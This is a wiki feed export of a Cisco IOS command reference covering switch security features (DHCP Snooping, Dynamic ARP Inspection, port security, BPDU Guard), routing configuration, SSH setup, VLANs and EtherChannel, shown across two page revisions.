=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using default administrative distance values listed in the section below.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example manually defining the administrative distance&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1121</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1121"/>
		<updated>2026-02-23T22:35:48Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Set Default Gateway */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway (switch) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Route / Default Gateway (Router) ===&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
